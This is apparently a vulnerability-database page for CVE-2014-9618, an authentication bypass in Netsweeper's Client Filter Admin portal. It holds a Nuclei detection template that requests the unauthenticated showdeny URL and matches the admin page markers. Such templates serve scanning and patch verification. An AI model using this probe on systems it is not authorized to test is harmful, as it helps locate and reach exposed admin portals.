CVE-2014-9618: Netsweeper - Authentication Bypass

2025-08-01 Netsweeper PoC Public

Description

The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.

PoC

id: CVE-2014-9618

info:
  name: Netsweeper - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.
  reference:
    - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9618
    - https://www.exploit-db.com/exploits/37933/
    - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-9618
    cwe-id: CWE-287
    epss-score: 0.72696
    epss-percentile: 0.99417
    cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netsweeper
    product: netsweeper
  tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'name=formtag action="../clientlogin/?srid=&action=showdeny&url="'
          - 'placeholder="Profile Manager">'
          - '<title>Netsweeper WebAdmin</title>'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009e2b8e10282cc7269c8bbb04882b9cc80059b600b40115d2d039b21081adac26022100ed4caf8574358ae691d8933fd2de2a64f7e1ce9379389d73572d26a49563dfc5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities